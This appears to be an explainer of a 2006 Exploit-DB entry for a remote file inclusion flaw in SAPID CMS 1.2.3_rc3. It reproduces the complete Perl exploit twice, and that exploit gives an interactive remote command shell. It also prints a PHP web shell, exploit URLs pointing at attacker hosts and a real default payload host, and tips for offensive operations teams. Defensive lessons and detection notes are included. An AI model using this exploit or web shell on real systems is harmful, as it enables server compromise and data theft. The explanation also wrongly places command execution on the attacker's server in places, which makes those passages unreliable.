SAPID CMS 1.2.3_rc3 'rootpath' Remote Code Execution Explained

What this paper is

This paper details a critical vulnerability in SAPID CMS version 1.2.3_rc3. The vulnerability allows for Remote Code Execution (RCE) through a flaw in how the application handles the root_path variable, leading to a Remote File Inclusion (RFI) vulnerability. The exploit leverages this RFI to execute arbitrary commands on the target server.

Simple technical breakdown

SAPID CMS, like many web applications, includes external PHP files to share common functions. The vulnerability lies in two specific files: get_infochannel.inc.php and get_tree.inc.php. These files use a variable named $root_path (or $GLOBALS["root_path"]) to specify the location of a crucial file: common_extfunctions.inc.php.

The problem is that the application doesn't properly check or sanitize the value of $root_path before using it in an include statement. This means an attacker can control the value of $root_path by sending a specially crafted URL. By setting $root_path to point to a remote file controlled by the attacker (e.g., a PHP file on their own server), the application will download and execute that remote file, effectively allowing command execution.

The exploit works by:

1. Targeting a vulnerable script: The attacker sends a request to either get_infochannel.inc.php or get_tree.inc.php.
2. Injecting a malicious root_path: The attacker provides a URL to a file they control (e.g., http://attacker.com/cmd.txt) as the value for root_path.
3. Including the attacker's file: The vulnerable script includes the attacker's file.
4. Executing commands: If the attacker's file contains PHP code that executes commands (e.g., system($_GET['cmd'])), those commands will be run on the target server.

Complete code and payload walkthrough

The provided exploit is a Perl script that automates the process of exploiting this vulnerability. It interacts with the target web application and provides an interactive shell-like interface for executing commands.

Let's break down the Perl script:

#!/usr/bin/perl

use LWP::Simple;

print "\n===============================================================\n";
print "=  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =\n";
print "===============================================================\n";
print "=       MorX Security Research Team - www.morx.org            =\n";
print "=       Coded by Simo64 - simo64\@www.morx.org                 =\n";
print "===============================================================\n\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];
$rsh  = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}

if(!@ARGV) { &usage;exit(0);}

	$targ = $ARGV[0];


	chomp($targ);
    chomp($rsh);

	$path = $targ."/usr/extensions/get_infochannel.inc.php";
	$con  = get($path) || die "[-]Cannot connect to Host";

sub usage(){
	print "Usage    : perl $0 host/path [OPTION]\n\n";
	print "Exemples : perl $0 http://127.0.0.1\n";
	print "           perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
	}

while ()
{
	 print "simo64\@morx.org :~\$ ";
	 chomp($cmd=<STDIN>);
     if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
     $getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
     $data=get($getit);
     if($cmd eq ""){ print "Please enter command !\n"; }
     else{ print $data ;}
}

# milw0rm.com [2006-08-10]

Payload/Shellcode Explanation:

The Perl script itself is not the payload in the traditional sense of shellcode bytes. Instead, it facilitates the execution of a payload hosted remotely. The "payload" is effectively whatever the attacker places in the file specified by $rsh.

The exploit paper mentions http://attacker/cmd.txt?cmd=id;pwd as an example. This implies that the attacker's file (cmd.txt in this case) is expected to be a PHP script that can execute commands passed via the cmd GET parameter. A typical sh.txt or cmd.txt for this exploit would look something like this:

<?php
// Example content for attacker's remote file (e.g., sh.txt)
// This file would be hosted on the attacker's server.

// The exploit script will send a URL like:
// http://target.com/usr/extensions/get_infochannel.inc.php?root_path=http://attacker.com/sh.txt?&cmd=id

// When SAPID CMS includes http://attacker.com/sh.txt?, PHP will execute this script.
// The 'cmd' parameter will then be appended by the exploit script.

// The vulnerable include statement in SAPID CMS is:
// include($root_path."usr/system/common_extfunctions.inc.php");
// So, when root_path is http://attacker.com/sh.txt?, the include becomes:
// include("http://attacker.com/sh.txt?&cmd=id");

// The PHP interpreter will fetch http://attacker.com/sh.txt?&cmd=id
// and execute it. If sh.txt contains the following code, it will
// execute the command passed in $_GET['cmd'].

if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Exploitation Flow:

1. Attacker sets up a remote file: The attacker hosts a file (e.g., sh.txt) on their web server. This file contains PHP code that executes commands passed via the cmd GET parameter.
2. Attacker runs the Perl script: The attacker executes the Perl script, providing the target URL and the URL of their remote file.
3. Perl script constructs URL: The Perl script builds a URL like http://target.com/usr/extensions/get_infochannel.inc.php?root_path=http://attacker.com/sh.txt?&cmd=some_command.
4. Target server processes request:
   • The target SAPID CMS server receives the request.
   • The get_infochannel.inc.php script is executed.
   • It encounters the line include($root_path."usr/system/common_extfunctions.inc.php");.
   • It substitutes $root_path with http://attacker.com/sh.txt?.
   • The include statement becomes include("http://attacker.com/sh.txt?&cmd=some_command");.
   • The PHP interpreter on the target server fetches the content from http://attacker.com/sh.txt?&cmd=some_command.
   • The attacker's sh.txt script is executed on the target server, and the system($_GET['cmd']); line runs some_command.
   • The output of some_command is returned by the attacker's script and then sent back to the attacker by the target server.
5. Perl script displays output: The Perl script receives the output and prints it to the attacker's console.

Practical details for offensive operations teams

• Required Access Level: This is a remote vulnerability, meaning no prior authenticated access to the target system is strictly required. However, the target must be running the vulnerable SAPID CMS version and have the vulnerable PHP files accessible via HTTP.
• Lab Preconditions:
  • A target environment with SAPID CMS 1.2.3_rc3 installed and accessible via HTTP.
  • A controlled attacker server to host the remote PHP script (sh.txt or similar). This server must be accessible from the target.
  • The Perl interpreter installed on the attacker's machine.
  • The LWP::Simple Perl module installed (cpan LWP::Simple).
• Tooling Assumptions:
  • Perl interpreter.
  • LWP::Simple module.
  • A web server on the attacker's side to host the payload.
• Execution Pitfalls:
  • Firewall/Network Restrictions: The target server might not be able to reach the attacker's hosting server due to network segmentation or firewall rules.
  • URL Encoding: Special characters in commands or the remote file URL might need URL encoding, which the provided script doesn't explicitly handle for the $rsh variable. The ?&cmd= part might also be sensitive to how the target server parses URLs.
  • Remote File Content: The attacker's remote file must be correctly crafted to execute commands. If it's not a valid PHP script or doesn't handle the cmd parameter, the exploit will fail.
  • root_path Parameter Handling: The exploit relies on the root_path parameter being directly used in an include statement without sanitization. If later versions of SAPID CMS or server configurations mitigate this, the exploit will not work.
  • get_infochannel.inc.php vs. get_tree.inc.php: The script defaults to get_infochannel.inc.php. If this file is not present or accessible, but get_tree.inc.php is, the attacker would need to modify the $path variable in the Perl script.
  • Default rsh URL: The default http://zerostag.free.fr/sh.txt might be defunct or blocked. It's crucial to use a reliable attacker-controlled server.
  • ? in root_path: The ? after $rsh in $getit = $path."?root_path=".$rsh."?&cmd=".$cmd; is interesting. It might be intended to ensure that the cmd parameter is treated as a separate parameter to the target script, rather than part of the remote file URL. However, depending on how the target's PHP handles include with URLs containing ?, this could lead to unexpected behavior or prevent the cmd parameter from being correctly passed to the remote script. A more robust approach might be to ensure the remote file itself handles parameters correctly.
• Telemetry:
  • Web Server Logs (Target): Look for unusual GET requests to /usr/extensions/get_infochannel.inc.php or /usr/extensions/get_tree.inc.php with a root_path parameter pointing to an external domain.
  • Web Server Logs (Attacker): Monitor requests to the attacker's hosted PHP file (sh.txt). This will show which commands were requested and executed.
  • Process Execution (Target): If commands are successfully executed, they will appear in the process execution logs of the target server, often as child processes of the web server daemon (e.g., apache2, httpd).
  • Network Traffic: Observe outbound connections from the target server to the attacker's server if the attacker's script performs any further communication.

Where this was used and when

• Discovery: August 2006.
• Publication: August 2006.
• Context: This vulnerability was discovered and published during a period when Remote File Inclusion (RFI) was a prevalent and severe vulnerability in PHP web applications. Many CMS and web frameworks of that era were susceptible to this type of attack due to insufficient input validation. SAPID CMS was a project hosted on SourceForge, indicating it was likely a smaller, open-source project where security might not have been as rigorously tested as in larger commercial applications.
• Likely Usage: Exploits like this were commonly used by attackers to gain initial access to web servers, deface websites, steal data, or use the compromised server as a pivot point for further attacks. The interactive shell provided by the Perl script made it convenient for attackers to explore the compromised system.

Defensive lessons for modern teams

• Input Validation is Paramount: Never trust user input. All external data, especially parameters used in file operations (like include, require, fopen), must be rigorously validated and sanitized.
• Principle of Least Privilege: Web applications should run with the minimum necessary privileges. This limits the impact if an RCE vulnerability is exploited.
• Secure Configuration: Ensure PHP's allow_url_fopen and allow_url_include directives are disabled in php.ini unless absolutely necessary and properly secured. allow_url_fopen allows include to fetch remote files, and allow_url_include specifically allows include and require to fetch remote files. Disabling these is a strong defense against RFI.
• Web Application Firewalls (WAFs): WAFs can detect and block common RFI patterns in HTTP requests, providing a layer of defense.
• Regular Patching and Updates: Keep all web applications, frameworks, and their dependencies updated to the latest secure versions. Vendors often release patches for known vulnerabilities.
• Code Auditing: Regularly audit application code for common vulnerabilities like RFI, SQL Injection, XSS, etc.
• Monitoring and Logging: Implement robust logging for web server access and application errors. Monitor these logs for suspicious activity, such as requests to include external files or unusual process executions.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a remote file inclusion mechanism.

+-----------------+       +--------------------+       +--------------------+
| Attacker's      | ----> | Attacker's Server  | ----> | Target SAPID CMS   |
| Machine         |       | (Hosts sh.txt)     |       | Server             |
| (Runs Perl      |       |                    |       | (Vulnerable App)   |
|  Script)        |       |                    |       |                    |
+-----------------+       +--------------------+       +--------------------+
        |                         ^                           |
        | 1. Sends request        |                           | 3. Includes remote file
        |    (e.g., GET /...)     |                           |    (e.g., http://attacker/sh.txt?...)
        |                         |                           |
        | 2. Receives command     | 4. Executes PHP on remote | 5. Executes command
        |    output               |    file (sh.txt)          |    (e.g., system($_GET['cmd']))
        |                         |                           |
        +-------------------------+---------------------------+
                                  |
                                  | 6. Returns command output
                                  +--------------------------->

Explanation:

1. The attacker's machine runs the Perl script.
2. The Perl script sends an HTTP request to the target SAPID CMS server. This request includes a crafted URL that points to a vulnerable script (get_infochannel.inc.php) and injects the attacker's remote file URL (http://attacker/sh.txt?) into the root_path parameter.
3. The SAPID CMS server, due to the vulnerability, uses the provided root_path to include the attacker's remote file.
4. The attacker's remote file (sh.txt), which is a PHP script, is fetched and executed by the target server's PHP interpreter.
5. The PHP script on the attacker's server then executes the command passed via the cmd parameter (e.g., id, pwd).
6. The output of the executed command is returned by the attacker's PHP script, then sent back by the target SAPID CMS server to the attacker's machine, where the Perl script displays it.

Source references

• Paper ID: 2161
• Paper Title: SAPID CMS 1.2.3_rc3 - 'rootpath' Remote Code Execution
• Author: simo64
• Published: 2006-08-10
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/2161
• Raw Exploit URL: https://www.exploit-db.com/raw/2161

Original Exploit-DB Content (Verbatim)

#########################################################################
# Title: SAPID CMS Multiple remote Command Execution Vulnerabilities
#
# Author: Simo64 <simo64_at_morx_org>
# 
# Discovered: 06 Aout 2006
# 
# Published : 08 Aout 2006
# 
# MorX Security Research Team
# 
# http://www.morx.org
# 
# Vendor : SAPID CMS
#
# Version : 123 rc3 ()
# 
# Website : http://sapid.sourceforge.net
# 
# Severity: Critical
# 
# Details: 
# 
# 
# [+] Remote File Inclusion
# 
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )
# 
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($root_path."usr/system/common_extfunctions.inc.php"); }
#
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#
# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files
# 
# [-] Exploit : 
# 
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd
# 
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd
#
#======================================
# Poc Remote Command Execution Exploit:
#======================================
#
# http://www.morx.org/sapid.txt
#
# C:\>perl sapid.pl http://127.0.0.1
#
# ===============================================================
# =  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =
# ===============================================================
# =       MorX Security Research Team - www.morx.org            =
# =       Coded by Simo64 - simo64@www.morx.org                 =
# ===============================================================

# simo64@morx.org :~$ id; ls
# uid=48(apache) gid=48(apache) groups=48(apache)
# get_calendar.inc.php
# get_filter_list.inc.php
# get_gb_records.inc.php
# get_infochannelfilter.inc.php
# get_infochannel.inc.php
# get_rss.inc.php
# get_searchresults.inc.php
# get_survey.inc.php
# get_track.inc.php
# get_tree.inc.php
# soap_call.inc.php
# simo64@morx.org :~$ exit

# Enjoy !
#
#!/usr/bin/perl


use LWP::Simple;

print "\n===============================================================\n";
print "=  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =\n";
print "===============================================================\n";
print "=       MorX Security Research Team - www.morx.org            =\n";
print "=       Coded by Simo64 - simo64\@www.morx.org                 =\n"; 
print "===============================================================\n\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];
$rsh  = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}

if(!@ARGV) { &usage;exit(0);}

	$targ = $ARGV[0];
	

	
	chomp($targ);
    chomp($rsh);
    
	$path = $targ."/usr/extensions/get_infochannel.inc.php";
	$con  = get($path) || die "[-]Cannot connect to Host"; 

sub usage(){
	print "Usage    : perl $0 host/path [OPTION]\n\n";
	print "Exemples : perl $0 http://127.0.0.1\n";
	print "           perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
	}

while ()  
{  
	 print "simo64\@morx.org :~\$ ";
	 chomp($cmd=<STDIN>);
     if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
     $getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
     $data=get($getit);
     if($cmd eq ""){ print "Please enter command !\n"; }
     else{ print $data ;}
}

# milw0rm.com [2006-08-10]